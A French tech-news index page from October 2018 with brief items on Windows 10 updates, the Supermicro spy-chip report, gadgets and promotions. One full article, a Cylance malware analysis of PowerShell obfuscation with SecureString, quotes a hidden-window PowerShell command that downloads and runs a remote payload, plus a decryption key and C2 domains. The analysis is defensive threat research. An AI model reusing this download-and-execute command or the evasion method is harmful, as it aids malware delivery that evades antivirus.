Dette publique de la France : euros

Nouveau !

tuile_telephones_1.jpg

Actualités

Microsoft suspend le déploiement de Windows10 October Update en raison d'un bug critique

Cela prend une tournure d'habitude. Au printemps dernier déjà, malgré le fait que Microsoft avait repoussé le déploiement de la mise à jour Windows 10 Scdrping Creators Update, des utilisateurs avaient rencontrés de gros problèmes rendant leur machines inutilisables. Cet automne, à peine Microsoft vient-elle de commencer le déploiement de la mise à jour majeure Windows 10 October Update qu'elle annonce l'interrompre en raison d'un bug critique.

Nous avons suspendu le déploiement de la mise à jour d’octobre 2018 de Windows 10 (version 1809)  pour tous les utilisateurs, alors que nous examinons des rapports isolés d'utilisateurs auxquels certains fichiers manquent après la mise à jour indique Microsoft.

Les malheureux isolés se retrouvent, après le processus de mises à jour, avec des fichiers qui ont disparus de certaines bibliothèques. Le terme de bibliothèques devant être compris selon le sens que lui donne Windows, à savoir des répertoires tels que 'Documents, 'Images', 'Vidéos', etc.

Où diable sont donc passés les fichiers perdus, et comment cela peut-il se faire ? Mystère... Mais il se pourrait qu'ils ne soient pas totalement perdus et que le support deMicrosoft propose un outil pour les récupérer, à en croire un tweet de Dona Sarkar, responsable du programme Windows Insider. Ah oui au fait ? Le programme Windows Insider ? Il ne sert pas à éviter de genre de problèmes ?

En attendant que les choses rentrent dans l'ordre, Microsoft recommande à ceux qui ont téléchargé manuellement la mise à jour de ne pas l'appliquer.

Catégorie actualité: 
Image actualité AMP: 

Publié il y a 1 semaine 1 jour Lire la suite...

Des captures de la Pixel Slate de Google ont fuité

Les produits de Google les plus attendus lors de l’événement qui se tiendra le 9 octobre à New York sont les Pixel 3 et Pixel 3 XL. Mais la firme va probablement présenter d’autres produits tout aussi marquants, dont la tablette Pixel Slate.

Publié il y a 1 semaine 1 jour Lire la suite...

Dissection d’une attaque : obfuscation de PowerShell à l’aide de SecureString

Les cybercriminels atteignent de plus en plus leurs cibles non pas grâce à des charges utiles personnalisées d’un nouveau genre, mais via ce que l’on qualifie de « malwares courants », c’est-à-dire des programmes prêts à l’emploi accessibles en ligne, que ce soit gratuitement ou à peu de frais. Tous les éditeurs de logiciels antivirus connaissent ces malwares et devraient être immédiatement en mesure d’identifier leur empreinte (ou « signature »).

Alors pourquoi les cybercriminels utilisent-ils de plus en plus des malwares courants ?

Et comment ces derniers leur permettent-ils de parvenir à leurs fins ?

La réponse à ces deux questions tient en un seul mot : l’obfuscation.

L’obfuscation et son mode de fonctionnement

Les cybercriminels ont de plus en plus tendance à utiliser des malwares courants. Pourquoi ? Parce qu’ils sont bon marché, sont faciles à exploiter et assurent leur anonymat. Lorsque l’empreinte d’un malware est connue de tous et à la portée de chacun, il est facile pour le cybercriminel de se cacher parmi un groupe extrêmement large de suspects. La signature de la charge utile perd alors toute signification.

Le fait qu’un malware courant parvienne à ses fins alors que sa signature est connue est un paradoxe qui s’explique par le concept d’obfuscation, une technique permettant de modifier efficacement la signature globale tout en délivrant la charge utile connue.

Avec l’obfuscation, l’attaquant ne cherche plus à personnaliser la charge utile finale, mais son mode de livraison. On peut supposer que cette évolution est une réponse à la façon dont les antivirus s’y prennent généralement pour intercepter les malwares.

De nombreux antivirus s’appuient sur les signatures pour identifier les malwares. Pour beaucoup d’entre eux, la signature est une simple valeur de hachage. Dans ce contexte, une valeur de hachage correspond à la représentation alphanumérique unique d’un malware. Les signatures prennent très souvent la forme de valeurs de hachage, mais il peut aussi s’agir d’une représentation courte d’une portion de code unique au sein du malware.

L’obfuscation désigne un ensemble de techniques utilisées pour esquiver les produits antivirus qui s’appuient principalement sur les signatures. Ces techniques changent la structure globale du malware sans altérer son fonctionnement. En général, elles ont pour effet de créer des couches permettant de dissimuler la charge utile, à la manière des pièces emboîtées les unes dans les autres dans une poupée russe.

Les techniques d’obfuscation courantes comprennent l’utilisation :

  • De compresseurs (packers) qui compressent, ou « empaquettent », le malware,
  • De chiffreurs (crypters) qui chiffrent le malware (entièrement ou partiellement),
  • D’autres obfuscateurs qui transforment le malware de différentes manières, sans le neutraliser, en modifiant le nombre total d’octets du programme.

Ces techniques d’obfuscation altèrent la valeur de hachage et, fréquemment, la signature du malware, soit en modifiant la taille du fichier (par compression), soit en chiffrant ses chaînes de code unique pour les rendre illisibles par les produits antivirus.

Certains logiciels antivirus recherchent les techniques d’obfuscation courantes afin de les blacklister, mais cette pratique n’est pas aussi établie que l’inscription sur liste noire des signatures de charge utile des malwares.

Exemple de méthode d’obfuscation exploitant les fonctionnalités de PowerShell, outil intégré à Microsoft Windows :

Le fichier de malware sur lequel porte l’analyse a recours à une méthode d’obfuscation rare de PowerShell. Le programme semblait utiliser plusieurs des techniques décrites par Daniel Bohannon. Le fichier analysé ci-après est une archive ZIP contenant à la fois un document PDF et un script VBS :

50e7fe23731ad94f1714c1a8acfce3f8b6e6e918b3e3aa1daa7275cb6052e68c.

Lorsque nous l’avons découvert, le fichier n’avait été détecté que par trois produits.

Le script VBS emploie un codage Base64 rudimentaire pour l’obfuscation de la première couche. Le contenu de ce script se présente comme suit :

Et voici le script une fois déchiffré :

Ce script VBS télécharge et exécute le fichier « http://ravigel.com/1cr.dat » via PowerShell à l’aide de la ligne de commande « PowersheLl -windowstyle hidden -noexit -executionpolicy bypass -command IEX(New-Object Net.Webclient)DownloadString.Invoke(‘http://ravigel.com/1cr.dat’) ».

De nombreuses techniques, comme le fractionnement des chaînes via la concaténation et l’affectation de variables, ainsi que l’utilisation d’accents graves « ` » et la capitalisation aléatoire des lettres, sont utilisées pour fractionner les mots ou les signatures sur lesquels les éditeurs de logiciels antivirus se basent généralement pour identifier les activités PowerShell suspectes.

C’est avec « 1cr.dat » que les choses deviennent intéressantes. Ce fichier se sert d’une méthode de chiffrement des chaînes inhérente au langage C# appelée SecureString ou, plus précisément, Marshal.SecureStringToGlobalAllocAnsi. Elle est couramment utilisée pour chiffrer les chaînes sensibles au sein des applications à l’aide du mécanisme DPAPI intégré de Microsoft.

Le contenu de « cr1.dat » est déchiffré au moyen de la clé sur 16 octets située à la fin du script : « 0x91, 0x60, 0x22, 0x96, 0xa5, 0xde, 0xd3, 0x63, 0xa5, 0x77, 0x11, 0x62, 0xe1, 0xe, 0xf9, 0xff ». Une fois déchiffrée, la chaîne se présente comme suit :

Le premier jeu d’instructions est là pour tromper les solutions automatisées de sandbox. Le script lui-même télécharge le fichier « ravigel.com/top.dat », une archive ZIP contenant un autre fichier appelé « top.tab ». « top.tab » est un fichier PE (Portable Executable) codé par la représentation ordinale de chaque octet hexadécimal, séparée par un espace («   ») et précédée de la mention « google\r\n ».

Une fois décodée, la charge utile binaire correspond à la valeur de hachage suivante :

f3cf988a64c1732b6b58a72922e93d182ba64298f6beae5de0c8de21477a9474

Lors de son premier déploiement par les cybercriminels, la charge utile n’a été détectée que par deux produits. Mais au moment où nous l’avons découverte, 18 produits l’avaient identifiée. La charge utile est un outil d’espionnage simple bien connu de la communauté de sécurité. Elle est considérée comme un malware courant. Elle communique avec le C2 « siberponis.com » et est également configurée pour dialoguer avec un serveur de sauvegarde, « baferdifo.com », qui n’est pas actuellement résolu en adresse IP.

Les cybercriminels allient de plus en plus techniques d’obfuscation et malwares courants. Cela accroît la capacité des malwares à déjouer les produits antivirus. Et en cas de détection, il est plus difficile de remonter à la source.

Cette tendance va à l’encontre de l’idée, largement répandue dans le milieu de la sécurité des informations, selon laquelle l’utilisation conjointe de malwares hautement personnalisés et d’exploits « zero day » est la pratique à laquelle nous devons prêter le plus d’attention. Même si le recours à ces techniques est préoccupant et doit être surveillé, nous ne devons pas pour autant nous désintéresser des cybercriminels, et notamment des auteurs de menaces avancées, qui échappent aujourd’hui aux analyses antivirus grâce à des outils courants et non « zero day ».

Equipe de Threat Intelligence
Cylance
obfuscation, PowerShell, cyberattaque
Mots clés Google: 

Publié il y a 1 semaine 1 jour Lire la suite...

PSN : Sony va peut-être vous laisser changer de nom

Selon une rumeur, Sony envisagerait permettre aux joueurs de modifier leurs noms sur Playstation Network…

Publié il y a 1 semaine 1 jour Lire la suite...

Jurassic World Fallen Kingdom : les coulisses de la scène choc en exclu

Saviez-vous que l'une des scènes les plus bluffantes du film Jurassic World Fallen Kingdom avait été tournée à l'aide d'un grand huit de fortune installé sur de vieux conteneur ?

Publié il y a 1 semaine 1 jour Lire la suite...

Le piratage de votre compte Facebook est probablement un hoax

Tout récemment, vous avez peut-être reçu un message en provenance d’un de vos amis Facebook mentionnant un possible détournement de votre compte. Une vieille connaissance vous annonce par message privé que quelqu’un lui a envoyé un message stipulant qu’el

Publié il y a 1 semaine 1 jour Lire la suite...

On lui vole toute sa collection de Lego, mais les internautes l'aident à la racheter

Il y a quelques jours, un collectionneur de Lego se faisait dérober presque toute sa collection. Valeur du cambriolage : 16 444 euros. Le collectionneur a tellement ému le Web sur YouTube, qu'une énorme campagne de soutien a été lancée.

Publié il y a 1 semaine 1 jour Lire la suite...

Vers un OnePlus 6T Porsche Design ?

Le constructeur chinois OnePlus a-t-il pour velléité de former un partenariat avec Porsche ? C’est ce que laisse à penser la dernière publication de son PDG.

Publié il y a 1 semaine 1 jour Lire la suite...

Verizon active le 1er réseau 5G domestique au monde

Les résidents de Los Angeles, Sacramento, Houston et Indianapolis sont prêts à bénéficier d’un accès Internet (...)

Publié il y a 1 semaine 1 jour Lire la suite...

Star Trek Discovery saison 2 : c'est le grand retour de Spock et du commandant Spike

Bien que le script de la saison 2 soit encore tenu secret, les acteurs de « Star Trek : Discovery » se sont réunis lors du New York Comic Con 2018 et nous ont offert un avant-goût du prochain voyage de l’USS Discovery et de son équipage.

Publié il y a 1 semaine 1 jour Lire la suite...

The Twilight Zone (la quatrième dimension), ça recommence

Près de 60 ans après la sortie de la série originale, le tournage de la reprise de The Twilight Zone, alias la Quatrième Dimension, a officiellement commencé.

Publié il y a 1 semaine 1 jour Lire la suite...

Puces espionnes chinoises : Apple et Amazon démentent formellement

Les deux géants de la Silicon Valley, mais aussi le Département de la Sécurité intérieure des États-Unis, nient formellement la rumeur selon laquelle des puces espionnes chinoises auraient été retrouvées sur les serveurs des deux compagnies.

Publié il y a 1 semaine 1 jour Lire la suite...

Le passage à l'heure d'hiver est un cauchemar pour l'Apple Watch Series 4

De nombreux possesseurs australiens de l’Apple Watch 4 se plaignent d’un méchant bug qui fait redémarrer leur montre intelligente en boucle. En cause, la fonctionnalité de la complication Activité qui ne supporte pas bien le passage à l’heure d’hiver.

Publié il y a 1 semaine 1 jour Lire la suite...

Nokia présente ses nouveaux écouteurs sans fil True Wireless Earbuds

Nokia n’est pas mort. La marque finlandaise, qui appartient maintenant à l’entreprise chinoise HMD, ne se contente plus de proposer des smartphones. Elle vend désormais des écouteurs : le True Wireless Earbuds et le Pro Wireless Earphones.

Publié il y a 1 semaine 1 jour Lire la suite...

[Promo] Le smartphone haut de gamme Huawei P20 à 449,00 €

Amazon propose ce smartphone haut de gamme avec un coupon de 100 € (il est disponible en noir ou en rose), ce qui fait passer son prix de 549 € à seulement 449 €. Ce n'est pas cher pour ce smartphone haut de gamme efficace.

Publié il y a 1 semaine 1 jour Lire la suite...

Jeu de combat : quel est le meilleur stick arcade ?

Afin de vous aider à choisir le stick arcade parfaitement adapté à vos besoins, nos collègues de Tom’s Hardware ont testé et comparé dix modèles différents et sélectionné les plus intéressants.

Publié il y a 1 semaine 1 jour Lire la suite...

Netflix vs SFR Play vs CanalPlay vs OCS vs Amazon : qui a le meilleur service de SVoD ?

Netflix, SFR Play, CanalPlay, OCS, Amazon, SFR... Les services de SVoD sont de plus en plus nombreux. Pour vous aider à y voir plus clair, nous les avons tous testés pendant plusieurs semaines et vous livrons nos conclusions.

Publié il y a 1 semaine 1 jour Lire la suite...

Nintendo : un brevet pour transformer le smartphone en Game Boy

Selon un brevet déposé par Nintendo et découvert par Siliconera, l'entreprise japonaise a travaille à un étui dont la face supérieure reproduit les boutons d’une Gameboy.

Publié il y a 1 semaine 2 jours Lire la suite...

Accident sur l'ISS : l'agence spatiale russe évoque un sabotage

Un mois après l’apparition d’un trou mystérieux sur le vaisseau spatial Soyouz amarré à la Station Internationale, l’enquête progresse. L’Agence spatiale russe évoque un dommage survenu lors de la fabrication.

Publié il y a 1 semaine 2 jours Lire la suite...

Apple utilise un logiciel pour bloquer les réparations par les tiers

Apple Service Toolkit 2 empêche toutes les réparations effectuées par un service non agréé.

Publié il y a 1 semaine 2 jours Lire la suite...

Plus de détails (et une image) sur "Le Mandalorien", la série Star Wars

Disney a dévoilé le nom des réalisateurs qui dirigeront les différents épisodes de sa nouvelle série inspirée de Star Wars

Publié il y a 1 semaine 2 jours Lire la suite...

Les skills d'Alexa vont coopérer entre eux

Amazon lance « Skill connexion », une option qui permet la réalisation de plusieurs tâches successives avec une seule commande.

Publié il y a 1 semaine 2 jours Lire la suite...

Des ports USB-C dans le nouveau SUV de Mercedes

Mercedes a dévoilé la dernière version de son EQC au Salon de Paris. Le constructeur promet une autonomie supérieure à 450 kilomètres et des ports USB-C.

Publié il y a 1 semaine 2 jours Lire la suite...

Le film Megaman est confirmé

Capcom a confirmé l’existence du projet visant à porter Megaman sur les écrans. L’éditeur a dévoilé le nom des réalisateurs

Publié il y a 1 semaine 3 jours Lire la suite...

RHA lance son concurrent aux AirPods

Bluetooth 5, compatibilité avec les assistants numériques et 25 heures d’autonomies : le TrueConnect de RHA possède de sérieux arguments face à ses concurrents.

Publié il y a 1 semaine 3 jours Lire la suite...

Les Tesla doublent automatiquement

Autopilot 9 réussit les changements de voie automatique. Toutefois, l’autonomie n’est toujours pas totale, le conducteur doit garder ses mains sur le volant.

Publié il y a 1 semaine 3 jours Lire la suite...

Chris Evans dit adieu à Captain America

Après huit ans dans la peau de Captain America, Chris Evans dit adieu au super-héros de Marvel. C’est en tout cas ce qu’on peut comprendre dans son message diffusé sur Twitter le 4 octobre dernier.

Publié il y a 1 semaine 3 jours Lire la suite...

Toyota rappelle 2,4 millions de voitures hybrides dans le monde

Le rappel concerne les modèles hybrides fabriqués entre octobre 2008 et novembre 2014, notamment les Prius et les Auris

Publié il y a 1 semaine 3 jours Lire la suite...

[Promo] Les meilleurs bons plans du week-end

Ne ratez pas les bonnes affaires du weekend. Nous vous avons sélectionné les meilleures du moment.

Publié il y a 1 semaine 4 jours Lire la suite...

.Net Core 3 étend le support

Le blog officiel .Net a dévoilé quelques éléments autour de .Net Core 3 et du .Net framework 4.8. .Net Core 3.0 est la prochaine version majeure qui supportera WinForms, WPF, Entité Framework 6. L’éditeur définit 3 usages de .Net Core 3 :

- côte à côte avec .Net : vous aurez la possibilité d’avoir plusieurs versions du Core.

- .Net Core pourra être directement embarqué dans l’application… et évitera les conflits avec un .Net plus ancien installé sur la machine cible

- l’avantage du Code est qu’il évolue plus rapidement que le framework .Net

.Net Framework 4.8 utilise les couches du navigateur Edge et des nouveaux players médias Windows. On remplace IE et Windows Media Player… Cette version permettra d’accéder aux contrôles introduits dans Universal Windows Platform, sans réécrire du code pour implémenter. Ces contrôleurs sont disponibles avec WinForms et WPF. Autre nouveauté : le framework supporte les résolutions 4k et 8k…

Catégorie actualité: 
Image actualité AMP: 

Publié il y a 1 semaine 4 jours Lire la suite...

iPhone Xs : petit format, grandes classe

Sorti il y a quelques semaines, l’iPhone Xs se rapproche en bien des points de son aîné, l’iPhone X. A-t-il sa place entre lui et l'iPhone Xs Max ?

Publié il y a 1 semaine 4 jours Lire la suite...

Cartes bancaires : laquelle choisir ? [Publi-édito]

La carte bancaire est devenue aujourd’hui le paiement le plus sûr, le plus pratique et le plus utilisé. Découvrez les différentes formules qui existent.

Publié il y a 1 semaine 4 jours Lire la suite...

Alienware m15 : enfin un laptop gaming fin et léger chez Dell

Dell a dévoilé l’Alienwarem15. Outre sa finesse, ce modèle est disponible en plusieurs configurations

Publié il y a 1 semaine 4 jours Lire la suite...

iOS 12 installé sur près de la moitié des appareils Apple

Selon les informations recueillies par Mixpanel, iOS 12 serait présent sur 46% des appareils Apple, il dépasserait bientôt son prédécesseur

Publié il y a 1 semaine 4 jours Lire la suite...

Valve purge Steam et dégage 179 jeux

Valve fait le ménage dans son catalogue. Pour cette première purge, 179 jeux sont retirés de Steam, son magasin de jeux en ligne. En cause, des fiches d’identités bien trop licencieuses ou politiquement incorrectes.

Publié il y a 1 semaine 4 jours Lire la suite...

Visual Studio 2017 15.9 Preview 3

Microsoft a présenté Visual Studio 15.9 Preview 3 Une mouture qui amène le support de ARM64 pour les applications UWP et des améliorations pour travailler avec Xamarin pour iOS.

En ce qui concerne le support ARM64, Vous pouvez maintenant créer des applications ARM64 UWP pour toutes les langues. Si vous créez une nouvelle application, la configuration ARM64 sera incluse dans le projet par défaut. Pour les applications existantes, vous devez simplement ajouter une configuration de solution ARM64 à l'aide du gestionnaire de configuration. Vos projets UWP seront automatiquement construits pour la bonne architecture lors de la sélection de cette configuration.

Visual Studio Tools pour Xamarin prend désormais en charge Xcode 10, ce qui vous permet de créer et de déboguer des applications pour iOS 12, tvOS 12 et watchOS 5. Par exemple, iOS 12 ajoute des raccourcis Siri, permettant à tous les types d’application d'exposer leurs fonctionnalités à Siri. Siri apprend ensuite quand certaines tâches basées sur une application sont les plus pertinentes pour l'utilisateur et utilise cette connaissance pour suggérer des actions potentielles via des raccourcis , comme illustré ci-dessous.

 A noter encore, les constructions de projet Xamarin.Android sont désormais plus rapide.

Catégorie actualité: 
Image actualité AMP: 

Publié il y a 1 semaine 4 jours Lire la suite...

The Big Hack : les clouds d'Apple, d'Amazon, de tout le monde, sont-ils piratés ?

The Big Hack ! Tel est le titre choisi par notre confrère pour une révélation que l'on peut qualifier de fracassante : des serveurs d'Amazon, d'Apple et probablement beaucoup d'autres organisations, auraient été 'customisés' par l'ajout d'une puce sur leur carte-mère, à des fins d'espionnage. Une affaire énorme, quoique démentie pas les différents protagonistes.

L'affaire débute en 2015, quand Amazon envisage de racheter la startup Elemental, spécialiste de la compression vidéo. Lors d'un audit, des puces qui n'ont rien à faire là sont découvertes sur des serveurs d'Elemental.

Les enquêteurs ont déterminé que les puces permettaient aux attaquants de créer une porte furtive vers n'importe quel réseau incluant les machines modifiées rapporte Bloomberg. C'est évidemment la panique car il s'agit là de la découverte d'une backdoor sur ce que l'on peut qualifier de botnet gigantesque. C'est d'autant plus la panique que la CIA et le Pentagone utilisent des serveurs d'Elemental. Amazon prévient bien entendu les autorités américaines immédiatement. Mais l'affaire est ensuite tenue secrète.

Selon les sources de Bloomberg, une trentaine d'entreprises, dont une banque, des sous-traitants du gouvernement américain et Apple seraient affectées. Mais celle liste, déjà très importante, n'est à priori pas limitative. Voici pourquoi :

Toutes les victimes de ce piratage ont un point en commun : elles sont clientes de l'entreprise américaine Super Micro dont l'activité est la fabrication de cartes-mères de serveurs. Mieux que cela : SuperMicro est LE numéro des cartes-mères de serveurs. 

Mais l'entreprise Super Micro, si l'on peut dire comme tout le monde, ne fabrique pas le matériel électronique qu'elle vend. Elle le fait fabriquer en Chine. Et c'est chez ses sous-traitants chinois que les cartes-mères de Super Micro ont été customisés avec une puce de la taille d'un grain de riz :-) Les sous-traitants auraient été contraints de procéder à ces manipulations par l'armée chinoise.

Super Micro compte plus de 900 clients dans 100 pays. Attaquer les cartes mères Super Micro Computer, c’est comme attaquer Windows. Cela revient à attaquer le monde entier, fait remarquer Bloomberg. Sauf que là, faut-il encore parler d'attaque ? Car il n'y a pas défense avec de tels procédés. Les ordinateurs visés sont compromis avant même d'avoir été sortis de leur emballage.

Pour Bloomberg, tout est clair : Les enquêteurs ont constaté que les puces avaient été insérées dans des usines gérées par des sous-traitants en Chine, selon plusieurs personnes proches du dossier [...] la sécurité de la supply chain mondiale a été compromise, même si les consommateurs et la plupart des entreprises ne le savaient pas encore.

Tous les intéressés soit démentent en bloc, soit ne font pas de commentaires. Mais Bloomberg est sûr de ses 17 sources différentes, dont des ingénieurs d'Amazon, d'Apple et même du renseignement américains. AWS était au courant d'une compromission avec la chaîne logistique, d'un problème de puces malveillantes ou de modifications matérielles lors de l'acquisition d'Elemental insiste Bloomberg.

Quand Apple affirme ne jamais avoir trouvé de puces malveillantes, ou de vulnérabilités intentionnelles dans ses serveurs, Bloomberg fait remarquer que dès 2016 la firme à la pomme a brusquement annulé un contrat avec Super Micro pour équiper 30.000 serveurs sur deux ans, après avoir retiré 7000 serveurs Super Micro de la circulation.


Photo : Bloomberg

Catégorie actualité: 
Image actualité AMP: 

Publié il y a 1 semaine 4 jours Lire la suite...

Des rendus officiels du Huawei Mate 20 ont fuité

Huawei est censé présenter le Mate 20 et le Mate 20 Pro le 16 octobre prochain. Peu d’informations sont encore disponibles concernant ces appareils, mais Winfuture nous propose de jeter un coup d’œil en exclu sur des rendus officiels.

Publié il y a 1 semaine 4 jours Lire la suite...

Une cascadeuse démontre l'efficacité de la détection de chute de l'Apple Watch 4

La santé est l’argument de vente principal d’Apple pour sa montre intelligente, la Watch 4. Une entreprise a entrepris de tester la fonctionnalité de détection de chute de celle-ci, et les résultats sont plus que concluants.

Publié il y a 1 semaine 4 jours Lire la suite...

Apple voudrait améliorer le stylet de ses iPad Pro

Apple compte utiliser un système à ultrasons pour améliorer la précision du Pencil

Publié il y a 1 semaine 4 jours Lire la suite...

Windows 10 : arrêtez tout ! La mise à jour d'octobre effacerait les données personnelles !

L'édition "October 2018 Update" de Windows 10, déployée cette semaine par Microsoft, serait victime d'un énorme bug : la mise à jour supprimerait purement et simplement les données personnelles des utilisateurs.

Publié il y a 1 semaine 4 jours Lire la suite...

Des photos du futur Roadster de Tesla ont (encore) fuité

Le Roadster de Tesla est encore très loin d’être prêt, et de l’avis de nombreux experts, nous sommes encore à quelques années de le retrouver chez nos concessionnaires automobiles. Cela n’empêche pas la compagnie d’Elon Musk de laisser fuir des photos.

Publié il y a 1 semaine 4 jours Lire la suite...

Les géants de la Silicon Valley auraient été piratés avec une minuscule puce espionne

Une micropuce pirate chinoise serait au cœur du hack le plus fou de l'histoire. Les géants de la Silicon Valley seraient les victimes de ce piratage aux ramifications géopolitiques.

Publié il y a 1 semaine 4 jours Lire la suite...

Daredevil saison 3 : la nouvelle bande-annonce envoie du pâté (et du bon)

Dans deux semaines exactement sera diffusée sur Netflix la 3e saison de Daredevil. En attendant, le diffuseur américain nous livre une bande-annonce démentielle, qui révèle quels seront les vilains que va devoir affronter le super-héros aveugle.

Publié il y a 1 semaine 4 jours Lire la suite...

1 mois gratuit puis 50% de réduction... Canal+ fait une offre irrésistible aux moins de 26 ans [Sponso]

Disposer d’un mois gratuit, d’un tarif de 9€95 (au lieu de 19€90) et tout ça sans engagement : Canal fait une offre que les – de 26 ans ne pourront pas refuser !

Publié il y a 1 semaine 4 jours Lire la suite...

L'histoire du compilateur Roselyn et comme Microsoft l'a rendu open source

A lire, ce très intéressant billet de Mads Torgersen, Lead Design de C# chez Microsoft. Mads raconte la genèse de Roselyn, le compilateur open source pour C# et Visual Basic.NET

Les premières conversations sur ce qui allait devenir Roslyn étaient déjà en cours lorsque j'ai rejoint Microsoft en 2005, juste avant la sortie de .NET 2.0. Cette conversation portait sur la réécriture de C # en C #. Ceci est une pratique normale pour les langages de programmation; une preuve de la maturité de la langue. Mais il y avait une motivation plus pratique et plus importante: nous, les créateurs de C #, ne programmions pas nous-mêmes en C #, nous codions en C ++!  raconte-t-il

Finalement, décision est prise de réécrire le compilateur C# en C#. Mais cela est difficile. En effet, explique-t-il, il faut que la nouvelle version fonctionne aussi bien, ou aussi mal que l'ancienne :-)

Les clients attendent du nouveau compilateur qu'il se comporte exactement de la même manière que l’ancien. Écrire un nouveau compilateur pour C # signifie essayer de faire correspondre les bugs du compilateur. Et je ne parle pas seulement de bugs connus, mais de ces comportements inconnus et non souhaités que les développeurs ont trouvés et sur lesquels ils se fient, souvent sans le savoir.

Si nous tous développeurs , nous savions déjà qu'écrire un programme correctement et sans bug n'est pas une tâche facile, nous découvrons là qu'écrire un programme correctement bogué est également difficile :-)

Bug ou pas, au départ, le code de Roselyn devait être fermé : Roselyn était encore un projet à source fermée. Depuis que le projet a réellement démarré en 2009, nous avions la vision de rendre nos compilateurs ouverts, mais Microsoft n'était tout simplement pas encore prête. La culture consistant à développer des brevets privés et à déposer des brevets autour de votre code d'origine reflétait le fonctionnement de Microsoft depuis les années 1970 - et même si des changements se produisaient, les choses allaient se dérouler plus lentement que prévu par notre équipe.

Mais beaucoup de chemin a été parcouru à Redmond depuis des années. Après Windows 8, une nouvelle direction est arrivée, qui a pris d'autres orientation, avec une philosophie de base différente, dans laquelle le mouvement open source a rapidement trouvé sa place.

En 2012, Microsoft avait créé Microsoft Open Tech. une organisation spécifiquement axée sur les projets open source. Roslyn a migré sous Microsoft Open Tech et est officiellement devenue open source, raconte Mads Torgersen.

Catégorie actualité: 
Image actualité AMP: 

Publié il y a 1 semaine 4 jours Lire la suite...

[Promo] Xbox One S 1 To + Sea Of Thieves à 205 €

Le site italien d'Amazon commercialise un pack comprenant la Xbox One S, accompagnée du jeu Sea Of Thieves, à seulement 205,53 € (avec les frais de port), au lieu de 250 €.

Publié il y a 1 semaine 4 jours Lire la suite...

Soirée Mutation Testing au ParisJUG le 24 octobre 2018

Cette soirée se déroulera le mardi 9 octobre dans les locaux de Henix. Les inscriptions sont ouvertes ici.

Voici l'agenda complet de la soirée :

9h15 à 19h30 : Accueil

19h30 - Making Mutants work for you

par Henry Coles

Mutation testing is a once obscure development technique that dates back to the 1970s. It deliberately introduces bugs into your code, then sees if your tests can find them.

Thanks to the open source tool pitest mutation testing has recently become much more widely used in the Java community. When people talk about mutation testing they often talk about "100% code coverage" but is this what it is really about? This session will cover the theory behind mutation testing and how to use it, but most importantly it will look at what it's really for and how it can make your life easier.

20h30 à 21h00 : Buffet offert par le ssponsors de l'événement.

21h00 - New types of tests for Java projects

par Vincent Massol

This talk will demonstrate advanced testing practices coming from the STAMP research project and applied to the XWiki open source project:

22h00 à ... : 3ème mi-temps des juggers dans un lieu sélectionné par votre Crew ;-)

Catégorie actualité: 
Image actualité AMP: 

Publié il y a 1 semaine 4 jours Lire la suite...

La Maison-Blanche veut que Google mette fin au projet Dragonfly

La nouvelle de la collaboration entre Google et le gouvernement chinois en vue de créer un moteur de recherche avait créé l’émoi auprès des employés de la compagnie. La Maison-Blanche demande désormais au géant de la recherche de mettre fin à ce projet.

Publié il y a 1 semaine 4 jours Lire la suite...

Civilization VI arrive sur iPhone

Firaxis Games poursuit sa stratégie de diversification en portant Civilization 6 sur iPhone. Ceux qui l'achèteront avant le 16 octobre bénéficieront de plus de 50% de remise.

Publié il y a 1 semaine 4 jours Lire la suite...

Pages